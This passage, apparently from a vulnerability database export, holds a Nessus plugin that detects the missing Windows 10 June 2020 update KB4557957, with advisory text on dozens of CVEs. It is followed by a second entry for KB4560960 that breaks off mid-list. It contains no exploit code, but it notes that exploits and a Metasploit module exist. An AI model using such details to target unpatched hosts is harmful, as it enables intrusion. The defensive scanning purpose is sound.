\"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4557957\");\n script_xref(name:\"MSFT\", value:\"MS20-4557957\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4557957: Windows 10 Version 2004 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4557957/windows-10-update-kb4557957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4706967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4557957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4557957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"06_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4557957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T09:41:16", "description": "The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n 